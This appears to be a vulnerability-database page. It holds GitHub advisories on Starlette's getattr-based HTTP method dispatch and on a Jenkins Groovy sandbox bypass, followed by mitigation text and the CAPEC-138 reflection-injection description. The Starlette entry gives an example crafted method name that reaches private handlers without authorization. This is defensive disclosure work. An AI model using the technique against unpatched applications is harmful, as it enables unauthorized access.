"details": "### Summary\n\nWhen dispatching a request, `HTTPEndpoint` selects the handler by lowercasing the HTTP method and looking it up as an attribute with `getattr`, without restricting the lookup to a known set of HTTP verbs.\n\nWhen an `HTTPEndpoint` subclass is registered through `Route(...)` without an explicit `methods=` argument, the route does not constrain the method and every method reaches the endpoint. If a non-standard HTTP method whose lowercased name matches an attribute on the endpoint subclass reaches the endpoint, that attribute is invoked as if it were a request handler. An attacker can use this to reach methods that were never meant to be HTTP handlers, such as internal helpers, without the authorization checks applied by the intended public handler.\n\n### Details\n\n`HTTPEndpoint` uses the client-supplied method name to resolve an instance attribute, without validating it against the set of HTTP verbs the endpoint supports. A method such as `_DO_DELETE` therefore resolves an attribute like `_do_delete` and invokes it. Non-standard methods are valid [RFC 9110](https://www.rfc-editor.org/rfc/rfc9110#name-method) token methods, so an endpoint must not treat the method name as a trusted attribute selector.\n\n### Impact\n\nAn application is affected when all of the following hold:\n\n* It defines an `HTTPEndpoint` subclass and registers it via `Route(...)` without an explicit `methods=` argument.\n* The subclass defines additional methods whose names match a non-standard HTTP-method token shape and that accept a single `request` argument and return a response.\n\nThis also affects frameworks built on Starlette, like FastAPI.\n\n### Mitigation\n\nRegister `HTTPEndpoint` subclasses with an explicit `methods=` argument on the `Route`, listing only the HTTP verbs the endpoint supports. The route then rejects any other method with `405 Method Not Allowed` before it reaches the endpoint, so non-standard methods cannot resolve an attribute.",
"id": "GHSA-x746-7m8f-x49c",
"modified": "2026-07-09T21:05:46Z",
"published": "2026-06-15T20:16:05Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Kludex/starlette/security/advisories/GHSA-x746-7m8f-x49c"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48817"
},
{
"type": "PACKAGE",
"url": "https://github.com/Kludex/starlette"
},
{
"type": "WEB",
"url": "https://github.com/Kludex/starlette/releases/tag/1.1.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Starlette: Arbitrary HTTP method dispatched to `HTTPEndpoint` attributes via `getattr`"
}
GHSA-X74X-QF5J-35JH
Vulnerability from github – Published: 2022-05-13 01:15 – Updated: 2022-06-01 19:41A sandbox bypass vulnerability in Jenkins Pipeline: Groovy Plugin 2.64 and earlier allows attackers to invoke arbitrary constructors in sandboxed scripts.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.jenkins-ci.plugins.workflow:workflow-cps"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.65"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2019-1003041"
],
"database_specific": {
"cwe_ids": [
"CWE-470"
],
"github_reviewed": true,
"github_reviewed_at": "2022-06-01T19:41:15Z",
"nvd_published_at": "2019-03-28T18:29:00Z",
"severity": "CRITICAL"
},
"details": "A sandbox bypass vulnerability in Jenkins Pipeline: Groovy Plugin 2.64 and earlier allows attackers to invoke arbitrary constructors in sandboxed scripts.",
"id": "GHSA-x74x-qf5j-35jh",
"modified": "2022-06-01T19:41:15Z",
"published": "2022-05-13T01:15:09Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003041"
},
{
"type": "WEB",
"url": "https://github.com/jenkinsci/workflow-cps-plugin/commit/2e5a67fde9baf25315fe692161b4e90d401da86c"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2019:1423"
},
{
"type": "PACKAGE",
"url": "https://github.com/jenkinsci/workflow-cps-plugin"
},
{
"type": "WEB",
"url": "https://jenkins.io/security/advisory/2019-03-25/#SECURITY-1353"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2019/03/28/2"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/107628"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Sandbox bypass vulnerability in Jenkins Pipeline: Groovy Plugin"
}
Mitigation
Refactor your code to avoid using reflection.
Mitigation
Do not use user-controlled inputs to select and load classes or code.
Mitigation
Apply strict input validation by using allowlists or indirect selection to ensure that the user is only selecting allowable classes or code.
CAPEC-138: Reflection Injection
An adversary supplies a value to the target application which is then used by reflection methods to identify a class, method, or field. For example, in the Java programming language the reflection libraries permit an application to inspect, load, and invoke classes and their components by name. If an adversary can control the input into these methods including the name of the class/method/field or the parameters passed to methods, they can cause the targeted application to invoke incorrect methods, read random fields, or even to load and utilize malicious classes that the adversary created. This can lead to the application revealing sensitive information, returning incorrect results, or even having the adversary take control of the targeted application.